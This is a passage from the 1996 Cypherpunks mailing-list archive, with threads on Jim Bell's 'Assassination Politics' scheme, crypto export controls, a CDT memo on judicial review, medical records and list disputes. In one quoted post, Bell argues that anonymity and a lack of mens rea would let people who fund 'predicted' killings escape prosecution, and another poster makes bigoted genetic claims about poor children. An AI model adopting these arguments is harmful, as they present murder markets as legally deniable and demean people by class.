ideas you are going to regret it >> >just as the left regreted having the USSR or the RAF associated with them. >> >> I for one don't respond well to extortion threats, so write your damned >article. > >Seconded. > >You know, the real problem with the average blackmailer is that they >rarely give you the offer as a legal document - if we fulfil our side of >the bargain, how can we be sure he fulfils his, and doesn't change his >mind next time someone half agrees with a pro >AP/Legal-blackmail/Tax-haven/Libertarian-state/freedom-of-speech/whatever >post? We obviously need some sort of legal contract to solve this >problem, but no, that's not possible in most countries, is it?. How >convenient. Till next time Phill ... > >Gary >-- >"Of course the US Constitution isn't perfect; but it's a lot better >than what we have now." -- Unknown. > >pub 1024/C001D00D 1996/01/22 Gary Howland >Key fingerprint = 0C FB 60 61 4D 3B 24 7D 1C 89 1D BE 1F EE 09 06 > > >----------------------- Headers -------------------------------- >From cypherpunks-errors at toad.com Tue Sep 24 17:53:36 1996 >Return-Path: cypherpunks-errors at toad.com >Received: from mailhub.MyMail.Com (mailhub.mymail.com [206.247.118.1]) by >emin27.mail.aol.com (8.6.12/8.6.12) with SMTP id RAA29223 for >; Tue, 24 Sep 1996 17:53:34 -0400 >Received: from toad.com by mailhub.MyMail.Com (5.x/SMI-SVR4) > id AA24368; Tue, 24 Sep 1996 15:53:31 -0600 >Received: (from majordom at localhost) by toad.com (8.7.5/8.7.3) id GAA13291 for >cypherpunks-outgoing; Tue, 24 Sep 1996 06:57:24 -0700 (PDT) >Received: from smokey.systemics.com (smokey.systemics.com [193.67.124.65]) by >toad.com (8.7.5/8.7.3) with SMTP id GAA13281 for ; Tue, >24 Sep 1996 06:57:12 -0700 (PDT) >Received: from kampai.systemics.com >(fLjlj5tpYpTi4i0Poa58tvhk9K+M7mOF at internal-mail.systemics.com >[193.67.124.74]) by smokey.systemics.com (8.6.12/8.6.12) with SMTP id >PAA12601; Tue, 24 Sep 1996 15:57:08 +0200 >Message-Id: <3247E8DF.FF6D5DF at systemics.com> >Date: Tue, 24 Sep 1996 15:57:51 +0200 >From: Gary Howland >Organization: Systemics Ltd. >X-Mailer: Mozilla 3.0 (X11; I; FreeBSD 2.1.0-RELEASE i386) >Mime-Version: 1.0 >To: cypherpunks at toad.com >Subject: Re: Hallam-Baker demands more repudiations or he'll write! >References: >Content-Type: text/plain; charset=us-ascii >Content-Transfer-Encoding: 7bit >Sender: owner-cypherpunks at toad.com >Precedence: bulk From richieb at teleport.com Wed Sep 25 10:01:05 1996 From: richieb at teleport.com (Rich Burroughs) Date: Thu, 26 Sep 1996 01:01:05 +0800 Subject: SAY WHAT? [Hallam-Baker demands more repudiations or he'll write!] Message-ID: <3.0b24.32.19960925063908.006821ec@mail.teleport.com> At 12:23 AM 9/25/96 -0700, Dale Thorn wrote: [snip] >I understood the intent of AP was to take powers the government is >already exercising (unconstitutionally), and merely transfer some of >them to the people, as it were. [snip] I always thought that the intent of AP was to bore me to tears and fill up my mailbox with rubbish :) Rich ______________________________________________________________________ Rich Burroughs richieb at teleport.com http://www.teleport.com/~richieb See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon U.S. State Censorship Page at - http://www.teleport.com/~richieb/state New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause From bdavis at thepoint.net Wed Sep 25 10:36:01 1996 From: bdavis at thepoint.net (Brian Davis) Date: Thu, 26 Sep 1996 01:36:01 +0800 Subject: Hallam-Baker demands more repudiations or he'll write! In-Reply-To: <199609250755.AAA14065@mail.pacifier.com> Message-ID: On Wed, 25 Sep 1996, jim bell wrote: > At 11:50 PM 9/24/96 -0400, Brian Davis wrote: > >... > >Amen to that. Add that at least one lawyer (and former prosecutor) on > >the list is confident that successful prosecutions will ensue is AP ever > >gets off the ground. > > I don't doubt that there will be harassment. (you can't deny that charges > would be brought even if it is tacitly agreed that no crime has been > committed; "the harassment-value" of such a prosecution would be desired > even if there is ultimately an acquittal.) AP will resemble, more than > anything, gambling. While gambling is illegal in some areas, it is quite > legal in others and there is no reason to believe that locales can't be > found in which an AP system could operate legally. By "successful prosecutions" I mean convictions. You can call a cow a duck, but it's still a cow. > Make American laws apply everywhere? That'll be hard to justify, unless you You obviously are unfamiliar with the established concept of extraterritorial jurisdiction. > want to unleash a world where an all people can be subject simultaneously to > the laws of EVERY country, should they choose to enforce them! Would you > like to be arrested in Red China for something you said years earlier in > America about their leadership? > > And are you ignoring the fact that the intentional isolation of one ^^^^^^^^^^^ Are you ignoring the principle of "willful blindness"? > participant from the knowledge of the actions and even the identity of the > others makes opportunities for prosecution on "conspiracy" charges mighty > slim. And since AP can operate across traditional jurisdictional I'm curious as to your qualifications to make the "mighty slim" judgment ... > boundaries, you're going to have to explain how you can prosecute Person A > in Country B for giving a donation to an organization in Country C, to be > paid to a person D in country E for correctly predicting the death of person > F in country G, particularly when none of the identities of these people or > countries can be easily known given a well-crafted cryptographic and > message-routing system. Be glad too. How much can you afford? > > Further, as you probably know as well as any, in order (at least, > supposedly!) to get a conviction you need to prove "mens rea," or "guilty > mind," and I suggest that none of the more passive participants in the AP > system have that. (The ones who DON'T pick up a gun, knife, bomb, poison, > etc.) Sure, they are aware that somewhere, sometime, somebody _may_ commit > a crime in order to collect a lottery, but they don't know who, what, when, > where, or how this will occur, if at all. (either before or after the fact!) > In fact, since it is possible for a target to collect the reward himself > (to be directed toward his designee, obviously) by committing suicide and > "predicting" it, it isn't certain to the other participants that there has > even been any sort of crime committed! Moo moo.* > Based on the mens rea requirement, I propose that there is plenty of room > for most of the participants to reasonably claim that they are guilty of no > crime. They have carefully shielded themselves and others from any guilty > knowledge, and presumably they are entitled to protect themselves in this > way. Morally, you could argue that these people are countenancing something > nasty, in the same sense that somebody could equally well argue that if you > buy a cheap shirt in Walmart you're partly responsible for sweatshop labor > in El Salvador. True, I suppose, but moral guilt does not always translate > into legal guilt. > Moo moo.* > > > And yes, I've read Jim Bell's manifesto. The fact > >that no lawyer has dissected it from a legal standpoint has been used by > >Mr. Bell as support for the propostion that it is legal. > > I suggest that there is a greater likelihood that the "powers that be" will > just abandon all pretense of legality, and attempt to strike at the > participants if they can find them without benefit of any sort of trial. > This is a more plausible conclusion, because it cuts through all of the > legal difficulties which would hinder prosecution. In effect, a low-level > undeclared war. I disagree that that will be the response, but you should be willing to allow one group of people to fight fire with fire. EBD > > Jim Bell > jimbell at pacifier.com > * Calling a cow a duck doesn't make it one. From cmefford at avwashington.com Wed Sep 25 11:14:49 1996 From: cmefford at avwashington.com (Chip Mefford) Date: Thu, 26 Sep 1996 02:14:49 +0800 Subject: unsubscibe Message-ID: unsubscibe From s1113645 at tesla.cc.uottawa.ca Wed Sep 25 11:22:45 1996 From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca) Date: Thu, 26 Sep 1996 02:22:45 +0800 Subject: Where to write crypto? In-Reply-To: Message-ID: On Tue, 24 Sep 1996, Steve Schear wrote: > I believe Taiwan might be an excellent location to have 'clear room' crypto > work done. Taiwan has a very large skilled software labor pool and isn't a > member of COCOM. Why go so far, when you can export crypto from Anguila or Canada. The first is right next to Florida and is a tax haven, the second has a large talent pool and the same qulity telecom as the States. The main problem is concealing the fact that there may be any Americans involved. Both save you the trouble of learning Chinese. From mwohler at ix.netcom.com Wed Sep 25 11:33:49 1996 From: mwohler at ix.netcom.com (Marc J. Wohler) Date: Thu, 26 Sep 1996 02:33:49 +0800 Subject: WHO IS MAKING A MOCKERY OF WHOM? Message-ID: <199609251426.HAA02190@dfw-ix1.ix.netcom.com> At 05:55 PM 9/24/96 -0400, you wrote: >At 06:15 AM 9/24/96 -0700, Sandy Sandfort wrote: > >>C'punks, >>Time for another informal poll. >> >>On Mon, 23 Sep 1996, John Anonymous MacDonald wrote: >>> What a joy to make a public mockery of Tim Mayo! >> >>Do list members think Anonymous' posts make a public mockery of >>Tim May or Anonymous? Let me know whose reputation you think >>is enhanced or tarnished by these posts. I'll post a summary to >>the list in a week or two. > I vote for Anonymous. Also, it seems evident that some non-anonymous posters aka KTOM seem to understand how to *abuse* our American freedom's but don't understand about *responsible* use. Is this a deliberate attempt to damage this list or is it that some folk just can't handle freedom? M. J. Wohler From jya at pipeline.com Wed Sep 25 11:37:08 1996 From: jya at pipeline.com (John Young) Date: Thu, 26 Sep 1996 02:37:08 +0800 Subject: PEA_nut Message-ID: <199609251417.OAA27148@pipe3.ny2.usa.pipeline.com> 9-25-96. WaJo reports on yesterday's suit challenging Georgia's crackerdown on the Internet, including its prohibition of anonymity. Ms. Dyson avidly supports anon, it lies. --------- http://jya.com/peanut.txt PEA_nut From jf_avon at citenet.net Wed Sep 25 12:36:04 1996 From: jf_avon at citenet.net (Jean-Francois Avon) Date: Thu, 26 Sep 1996 03:36:04 +0800 Subject: Hallam-Baker demands more repudiations or he'll write! Message-ID: <9609251433.AB02026@cti02.citenet.net> On 25 Sep 96 at 5:59, Brian Davis wrote: > I disagree that that will be the response, but you should be willing > to allow one group of people to fight fire with fire. But generally, it has been found a much better solution to fight fire with water, and this is why I am not convinced of the ideological effectiveness of AP, although I don't doubt it's operationnal effectiveness at all. I will take that sentence only slightly out-of-(specific)-context and make a still pertinent remark about it: This is *exactly* what Jim Bell, because of his opinions, envision to do with the AP system. I find that absolutely hilarious! jfa Please reply by e-mail since I am not on Cypherpunks anymore. From pgf at acadian.net Wed Sep 25 12:44:32 1996 From: pgf at acadian.net (Phil Fraering) Date: Thu, 26 Sep 1996 03:44:32 +0800 Subject: ISPs' information on users In-Reply-To: Message-ID: On Tue, 24 Sep 1996, Timothy C. May wrote: > (There's a certain new ISP with tight links to a quasi-religious group much > in the news lately, and some have speculated that this ISP may be > monitoring certain users....) > > --Tim May Which ISP and religious group is this? Phil Fraering The above is the opinion of neither my internet pgf at acadian.net service provider nor my employer. 318/261-9649 From sandfort at crl.com Wed Sep 25 12:46:06 1996 From: sandfort at crl.com (Sandy Sandfort) Date: Thu, 26 Sep 1996 03:46:06 +0800 Subject: AP [was: Re: Kiddie porn on the Internet] [NOISE] In-Reply-To: <32488A8F.6FF2@gte.net> Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, On Tue, 24 Sep 1996, Dale Thorn wrote: > You are committing a logical fallacy with the above. You're saying that > the mugger who commits the crime with a stolen gun is equivalent to my > own hired hitmen (the local and federal police I pay so dearly for). Incorrect. Dale is assuming facts not in evidence. See below. > This is obviously not the case. I didn't hire the mugger, nor did I > encourage the thief in an overt way. But I did consciously select and > pay for the police and govt. assassins. Than perhaps attacks against Dale are appropriate since he takes credit for supporting these people. > And so did you. Unless you're saying that the govt. forcibly > takes you down to the voting booth, etc. Well, I don't know what "etc." is supposed to include, but I don't vote. But even assuming, arguendo, that I did, (a) I see no support if I were to vote AGAINST government assassins who are none the less elected, and (b) even a self-defense vote for the lesser of two evils is an awfully thin thread on which to hang a death sentence. Should Sofie, in the movie, "Sofie's Choice" have been put to death because she exercise the "choice" given to her of choosing which of her children was to live? I don't think so. S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From pgf at acadian.net Wed Sep 25 12:46:20 1996 From: pgf at acadian.net (Phil Fraering) Date: Thu, 26 Sep 1996 03:46:20 +0800 Subject: Medical Data In-Reply-To: Message-ID: Of course, one area where the doctor will continue to hold a patient's records, instead of the patient, due to the nature of the current system: Prescription medication. Of course, with the really big problems with this stuff, drug interactions, there's still no system for a doctor to find out what you're on thanks to another doctor. Which is why it's very important to always use the same pharmacist. Phil Fraering The above is the opinion of neither my internet pgf at acadian.net service provider nor my employer. 318/261-9649 From pgf at acadian.net Wed Sep 25 12:49:28 1996 From: pgf at acadian.net (Phil Fraering) Date: Thu, 26 Sep 1996 03:49:28 +0800 Subject: Hallam-Baker demands more repudiations or he'll write! In-Reply-To: Message-ID: I guess the final word on assasination politics would be obvious: It's widely believed that the New Orleans Mafia (the source of my recent statement about body decomposition in Louisiana swamps) was a prime driver in the assasination of the late President John F. Kennedy. I think it's fairly safe to say that having done this didn't do them a damn bit of good. It didn't do anyone else a damn bit of good. The world remained just as corrupt as it always was. Phil Fraering The above is the opinion of neither my internet pgf at acadian.net service provider nor my employer. 318/261-9649 From asgaard at Cor.sos.sll.se Wed Sep 25 12:50:21 1996 From: asgaard at Cor.sos.sll.se (Asgaard) Date: Thu, 26 Sep 1996 03:50:21 +0800 Subject: Medical Data In-Reply-To: Message-ID: On Tue, 24 Sep 1996, Timothy C. May wrote: > Why can't patients carry their _own_ medical records, and disclose what > they wish to disclose to doctors and hospitals, as they see fit? Whether > implemented in a high-tech version, as a "smart card," or a low-tech > version, as a "dossier" (a file folder), the principle's the same. One problem is when a patient is suing his doctor, but claiming that his 'dossier' was lost in a fire. The doctor then has to defend himself with only 'your word against mine' instead of having his own account of what was happening on file, including test results etc that could be very interesting for the defence. Asgaard From pgf at acadian.net Wed Sep 25 13:00:16 1996 From: pgf at acadian.net (Phil Fraering) Date: Thu, 26 Sep 1996 04:00:16 +0800 Subject: Public Schools In-Reply-To: <20uRuD1w165w@bwalk.dm.com> Message-ID: On Tue, 24 Sep 1996, Dr.Dimitri Vulis KOTM wrote: > You must have attended a public school if you don't understand that geentic > superiority leads to economic success. My older kid goes to a private school. > The parents are obviously genetically superior to public school parents. Stop wallowing around in determinism if you expect to get anywhere. > > And the reason it costs so much to send a kid to private school is that > > everyone's already paying for a more expensive public school thanks to all > > the taxes. > > Push vouchers. What's the cryptorelevance of your comments, anyway? Without vouchers, you don't say anything about the intelligence of your test subjects; to a _very_ large degree, intelligence isn't genetic. Or it helps for the first five minutes, but after that you're on your own. "The world is full of unrewarded genius..." > > So if I'm economically successful it'll change my genes? > > > > I guess this is the famous Russian belief in Lamarkianism in action. > No, on the contrary, sending poor kids to good schools on scholarships > does not improve their genes. They tend to become drug dealers. At the private school I went to this was not the case. Only the spoiled rich kids were that stupid, although by your definitions, they should have been smarter than that. > Dr.Dimitri Vulis KOTM > Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps > Phil Fraering The above is the opinion of neither my internet pgf at acadian.net service provider nor my employer. 318/261-9649 From asgaard at Cor.sos.sll.se Wed Sep 25 13:02:16 1996 From: asgaard at Cor.sos.sll.se (Asgaard) Date: Thu, 26 Sep 1996 04:02:16 +0800 Subject: We removed radikal 154 from xs4all :( In-Reply-To: <199609242023.NAA10037@dns1.noc.best.net> Message-ID: On Tue, 24 Sep 1996, James A. Donald wrote: > Let us just run through the sequence of events. > > A bunch of leftover commies publish some boring commie crap in Germany, > which probably most people would have ignored. But are these people really 'leftover commies'? Trying to read #154 is rather confusing (but my German is not that great, which could explain this). The 'Autonomen' don't seem to be 'leftover' in the real sense, you get the impression they are young people. Obviously they are opposed to the 'Punks' whatever that means. I wish someone from Germany could deliver a short resume of their political views - the interesting question being why the German authorities obviously fear them. (One German on the list has opinioned that they are 'childish' but that doesn't say much.) Asgaard From tcmay at got.net Wed Sep 25 13:05:36 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 26 Sep 1996 04:05:36 +0800 Subject: reputation, e.g. www.ffly.com (was: Not reputation again! (Was: The Nature ofthe Cypherpunks List) ) Message-ID: As Bryce addressed this to me as the primary recipient, I have to assume he's ascribing these ideas to me. At 12:19 PM 9/25/96, bryce at digicash.com wrote: >-----BEGIN PGP SIGNED MESSAGE----- > >It's silly to conflate ratings of people with ratings of >people's opinions with ratings of people's ratings of etc. > > >Some of the people I work with have awful opinions on politics, >other people, music, movies, books, and food, but great opinions >on computer hardware, algorithms and programming languages. ... I never said there is going to be a simple scalar rating. In my last major post on this, several weeks ago, I even elaborated, saying that even Alice's rating of Bob, for example, would have multiple components, such as her rating of his taste in movies, his taste in restaurants, his political beliefs, his technical expertise, etc. This area is complicated enough to talk about with oversimplifying-and-then-critiqueing. These are usually called "straw man" arguments. --Tim We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From jya at pipeline.com Wed Sep 25 13:13:18 1996 From: jya at pipeline.com (John Young) Date: Thu, 26 Sep 1996 04:13:18 +0800 Subject: Esther Dyson and anonymity Message-ID: <199609251656.QAA03196@pipe3.ny2.usa.pipeline.com> You're right, I was too mindlessly rantish about Esther Dyson's WSJ comments. However, I bought Esther a bottle of champagne in NYC a few days ago, sent it to her table signed "An Admiring Cypherpunk." She came over to say hello, and we chatted a a bit about her recent messages on Cypherpunks, which I complimented her for posting. She still doesn't know my name, I said I was "Anonymous." She grinned and staggered away. The champagne brought her over to the side of Anonymous, that's it. AYA From loki at infonex.com Wed Sep 25 13:17:42 1996 From: loki at infonex.com (Lance Cottrell) Date: Thu, 26 Sep 1996 04:17:42 +0800 Subject: We removed radikal 154 from xs4all :( In-Reply-To: <199609242023.NAA10030@dns1.noc.best.net> Message-ID: At 12:45 AM -0700 9/24/96, James A. Donald wrote: >Every time one site capitulates, it will inspire two dozen others to >join the fray. I joined the fight *because* xs4all had to capitulate. > Speaking of which, is there a list of mirror sites? Just for the record: http://www.cyberpass.net/radikal -Lance ---------------------------------------------------------- Lance Cottrell loki at obscura.com PGP 2.6 key available by finger or server. Mixmaster, the next generation remailer, is now available! http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche ---------------------------------------------------------- From tcmay at got.net Wed Sep 25 13:22:50 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 26 Sep 1996 04:22:50 +0800 Subject: unsubscibe Message-ID: At 2:00 PM 9/25/96, Chip Mefford wrote: >unsubscibe "unsubscibe" is not a word. Nor is "unsuscrive," or "unscrive." Send the correct word to the correct address, stated often here, and you will be unsubscribed. --Tim May (Hint: majordomo at toad.com, with message body of "unsubscribe cypherpunks" (no quotes)) We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From gnu at toad.com Wed Sep 25 13:28:20 1996 From: gnu at toad.com (John Gilmore) Date: Thu, 26 Sep 1996 04:28:20 +0800 Subject: Feds trying to stop judicial review of Commerce Dept export controls Message-ID: <199609251631.JAA18345@toad.com> [They appear to be trying to transfer all the export controls from the State Dept to the Commerce Dept -- including all the unconstitutional and heavy-handed parts. -- John] Date: Wed, 25 Sep 1996 11:34:23 -0400 From: (Daniel J. Weitzner) Memorandum To: Interested Parties Re: Proposed Amendments to Preclude Judicial Review in the Export Administration Act of 1996 (H.R. 361) Date: September 25, 1996 Failed U.S. encryption export controls continue to threaten Internet security, individual privacy, and the competitiveness of U.S. industry. Proposed amendments to H.R. 361, The Omnibus Export Administration Act of 1996 (see attached), would make this problem worse by preventing judicial review of Commerce Department export control decisions, and should be defeated. These Amendments: * Would further entrench a failed U.S. encryption policy * Would provide extraordinary relief that is unjustified, and would shift the balance of power in the ongoing public debate over Internet security. * Will prevent judicial review of a broad area of public policy affecting the First and Fourth Amendment rights of Americans. * Are inappropriate legislative meddling in ongoing controversies * Are unnecessary as the EAA already contains strict judicial review provisions. On balance, the Amendments would shelter the highly sensitive area of Internet security from much-needed judicial scrutiny . The Amendments are inappropriate, unjustified, and should not be approved. The Amendments entrench a failed U.S. encryption policy -- Administration export regulation of encryption keep U.S. computer users from protecting their privacy online and damage the competitiveness of U.S. industry. Three active cases in Federal Court are challenging these export controls. Three bills have been proposed in this session of Congress with bipartisan support to address what many believe to be the inappropriate application of export controls to encryption exports. The Amendments would further entrench these controversial regulations by sheltering them from much-needed judicial scrutiny. The Amendments provide extraordinary, unjustified relief -- The Amendments would preclude all judicial review under the Administrative Procedure Act, including challenges to arbitrary and capricious rule-making or improper statutory interpretation. They would extend the already limited judicial review provisions in the original EAA and H.R.361 to preclude nearly all substantive review. Congress has made no findings that would suggest that such unusual relief is warranted. Typically, relief from judicial review might be granted in areas where excessive or inappropriate litigation is feared in areas that Congress feels are well-settled. Such is not the case here. The problem with encryption export controls has not been too much litigation. The Amendments prevent judicial review of decisions that implicate First, Fourth, and Fifth Amendment rights -- Export controls have been the Administration's exclusive vehicle for the its key escrow encryption proposals -- which have a grave impact on American's First, Fourth, and Fifth amendment right. The Amendments would thus preclude judicial review in an area broadly affecting the rights of individuals and the growth of a new medium. The Amendments will likely interfere with important cases and controversies -- These Amendments would raise a serious impediment to those seeking judicial relief from what many believe to be unfair encryption export control policies. Judicial review provisions in the EAA and the Arms Export Control Act (AECA) were the basis for a federal judge's recent dismissal of a challenge to the encryption export controls. The EAA provisions will soon take on added significance as it is widely believed that the Administration will shift jurisdiction over encryption export controls from the State Department to the Commerce Department in the near future. The Amendments are unnecessary -- H.R. 361 as passed by the House already contains significant judicial review limitations. The bill already provides unusual constraints -- on both subject matter and venue -- for challenges to Commerce decision-making under the Act. There is little to indicate that the further extraordinary relief of these Amendments is required. * * * * * Encryption export controls represent an area where it is widely believed that the Administration is abusing its discretion in order to use powerful export regulations to influence the domestic market for and use of important technologies. Without recourse in the Executive Branch -- or in Congress this session -- concerned parties have been forced to turn to the courts. It is in just such a critical area where parties are most in need of judicial review. The Amendments suggested would serve to deny individuals and companies their much-needed day in court, have not been justified, and should not be approved. For more information, please contact: Daniel Weitzner, Deputy Director Alan Davidson, Staff Counsel Center for Democracy and Technology (202) 637-9800 Amendments to The Omnibus Export Administration Act of 1996 (H.R. 361) 1. Amendment to Section 112 (Administrative and Judicial Review) Text: On page 125, at line 17 in Section 112, insert: "The provisions of this section shall constitute the exclusive basis for judicial review of any agency action taken pursuant to this title and the regulations promulgated thereunder." On page 126, at line 1 in Section 112(a)(2), insert "only" between "reviewed" and "by appeal". On page 126, at line 3 in Section 112(a)(2), insert "and only" between "Circuit," and "to the extent". On page 126, at line 6 in Section 112(a)(2)(A), strike (A) and replace as follows: "(A) regulations fail to provide for procedures required by this title;". On page 126, at line 12 in Section 112(a)(2)(B), insert "procedural requirements of" between "violates" and "this title;". On page 127, at line 5 in Section 112(a)(2)(H), insert "procedural" between "with the" and "requirements". On page 127, at line 7, add a new paragraph (3) to Section 112(a) as follows: "Preclusion of Review. -- Substantive decisions of the Secretary and other officials on (i) whether to impose, expand, or extend export controls on any commodity or technology, (ii) whether and how to revise the Commodity Control Index, (iii) whether and under what conditions to grant, deny, or modify any export license, and (iv) any other questions of law or fact under this title (except as otherwise provided in subsections (b)-(d) of this section), shall be final and conclusive and no court shall have power or jurisdiction to review any such decision by an action in the nature of mandamus or otherwise." ============================================================================ Daniel J. Weitzner, Deputy Director Center for Democracy and Technology 202.637.9800 (v) 1634 Eye St., NW Suite 1100 202-637.0968 (f) Washington, DC 20006 http://www.cdt.org/ * PROTECT THE INTERNET AND THE FUTURE OF FREE SPEECH IN THE INFORMATION AGE * Join the legal challenge against the Communications Decency Act! For More Information, Visit the CIEC Web Page http://www.cdt.org/ciec/ or email From ceo at oss.net Wed Sep 25 13:43:24 1996 From: ceo at oss.net (Robert Steele) Date: Thu, 26 Sep 1996 04:43:24 +0800 Subject: your mail In-Reply-To: <10093730201704@infowar.com> Message-ID: Requiring people to call Betty to tell her they sent email is very low rent and will discredit the site. Recommend you delete that element. Like putting roller skates on a horse! From dlv at bwalk.dm.com Wed Sep 25 13:51:46 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Thu, 26 Sep 1996 04:51:46 +0800 Subject: Public Schools In-Reply-To: Message-ID: Phil Fraering writes: > Without vouchers, you don't say anything about the intelligence of your > test subjects; to a _very_ large degree, intelligence isn't genetic. Or That's the political correct thing to say, but do you have any scientific evidence to support this claim? --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From webwarrior at infowar.com Wed Sep 25 13:52:20 1996 From: webwarrior at infowar.com (Craig) Date: Thu, 26 Sep 1996 04:52:20 +0800 Subject: No Subject Message-ID: <10093730201704@infowar.com> Subject Line: Infowar.Com > ---- D I S T R I B U T E W I D E L Y ---- > >WWW.InfoWar.Com is now open. > >The Definitive WWW site for Information Warfare & Information Security. Created and managed by Winn Schwartau, Infowar.Com is designed to be "The" place to be seen and be heard. Be seen. Be linked. Our goal: To be a clearinghouse for all IW and InfoSec. > >News. Infowar. Articles. Discussions. The Latest. Experts. Reviews. Opinion. >Civil Defense. Info-Security. Controversy. Privacy. Crypto. Chats. List-servers. >Espionage. Military. C4I. Civil Defense. Global. > >Be seen. Be heard. Globally. Dynamic. New. Interactive. > >Yes, we're starting off small - manageable, but within a few short months look >at what we will have - on-line, bringing in tens of thousands of infosecurity >and information professionals. With your help, we'll be everything you want us >to be. > >* Timely Articles and Commentaries >* Military/Government infowar treatises hot off the press >* News that concerns you - As it Happens! >* Infowar.Com List Server and Private Discussion Groups (to begin with) > Infowar > Civil Defense > Terrorism > OSCINT > Hacking >* Over 600MB of on-line utilities for the Net >* On-Line Searches for Infowar and Infosec >* The Infowar and Infosec Papers That Set Standards >* Press Releases >* What's New!?! >* Audio Conferences >* Video Conference >* Specifications and Standards >* Product and Company Listings - Worldwide >* Contracts and Bids >* Specifications >* New papers and reports in all areas of Infowar >* Extensive International participation >* Compilations of the Best of Infowar and Infosec >* Hundreds of Security Utilities >* Over 50 different encryption tools >* User customized search engines for the entire site >* Interactive Infowar-Chat lines >* Who's Who of Infowar and Info-Sec >* Gigs and gigs . . . . >* And more . . . stuff we won't even tell our mothers about . . . yet . . > >We've always been interactive minded and we will count upon our users and >sponsors to guide us to provide better and better service. But, we will not >react to editorial extortion, either. We have made our reputation on >brutal honesty and opinion and we will keep it. Might lose an advertiser from >time to time, but those is the breaks. > >We hope to see you there, contributing, interacting, discussing, commenting, >posting and contributing. Contributions: betty at infowar.com or webwarrior at infowar.com All submissions are gratefully accepted however, will be reviewed for relevance and content prior to being published. IF - you hear something hot...see something hot..... be a good Warrior and call Betty at 813-367-7277 and leave a message that you have e-mailed the info. That way we can be sure to look for it and get it out on distribution. You want to add some Warriors to our ListServ: betty at infowar.com or webwarrior at infowar.com > >If you happen to be interested in Infowar.Com Sponsorship opportunities, please give us a ring: Our rates are very competetive.... and get on the bandwagon so we can *lock-in the rate. > >Betty at Infowar.com >or call >813.367.7277 > >Thank You > >Winn Schwartau >and the terrific folks at >Infowar.Com > Winn Schwartau - Interpact, Inc. > Information Warfare and InfoSec > V: 813.393.6600 / F: 813.393.6361 > Http://www.infowar.com > Winn at infowar.com > From tcmay at got.net Wed Sep 25 14:03:49 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 26 Sep 1996 05:03:49 +0800 Subject: Anonymous Mail at US Post Message-ID: At 12:45 AM 9/25/96, Greg Kucharo wrote: >I don't know if anyone else has seen this, but I was mailing letters >in the "out front" boxes the other day when I noticed a sign. The sign >said that all packages 16 ounces or over had to be taken inside for >disposal into the mail slot. The obvious explanation being that even >though you can abstain from marking a return address, the postal >inspectors would like a nice photo of you with your mail. Yes, this was the chief topic of discussion here a few weeks ago. :-} One of the serious downsides of someone filtering out messages is that all 1400 of us then see the same topics presented again. (This is more serious when people are forwarding long articles or press releases, with sometimes half a dozen copies being received on the list.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From m5 at tivoli.com Wed Sep 25 14:12:09 1996 From: m5 at tivoli.com (Mike McNally) Date: Thu, 26 Sep 1996 05:12:09 +0800 Subject: Rutgers DIMACS Dist. Trust Workshop Message-ID: <32496D93.7885@tivoli.com> Has anyone who's registered for next week's conference at Rutgers gotten any sort of confirmation? I've been trying for days to do so, and though I've sent mail and called I haven't managed to get hold of anyone who can tell me anything. (And now they seem to not answer the phone at all; I think they got a bigger response than they expected.) -- ______c_________________________________________________________________ Mike M Nally * IBM % Tivoli * Austin TX * How quickly we forget that mailto:m5 at tivoli.com mailto:m101 at io.com * "deer processing" and "data http://www.io.com/~m101/ * processing" are different! From vipul at pobox.com Wed Sep 25 14:38:40 1996 From: vipul at pobox.com (Vipul Ved Prakash) Date: Thu, 26 Sep 1996 05:38:40 +0800 Subject: Euro-Commission to tackle porn on Internet Message-ID: <199609260004.AAA00668@fountainhead.net> *** Euro-Commission to tackle porn on Internet The European Commission, faced with calls to clamp down on Internet pornography following a Belgian pedophilia scandal, will take a first step in October toward seeing how it can be done. On Oct. 9, Culture Commissioner Marcelino Oreja plans to unveil a paper outlining how to identify authors of Internet pornography and how to interrupt that pornography. Oreja said options raised in the paper include encrypting access so that only those who pay could see the material or including a V-chip to screen against pornographic content. For the full text story, see http://www.merc.com/stories/cgi/story.cgi?id=178562-80c - Vipul -- Vipul Ved Prakash | - Electronic Security & Crypto vipul at pobox.com | - Internet & Intranets 91 11 2247802 | - Web Development & PERL 198 Madhuban IP Extension | - Linux & Open Systems Delhi, INDIA 110 092 | - (Networked) Multimedia From pgut001 at cs.auckland.ac.nz Wed Sep 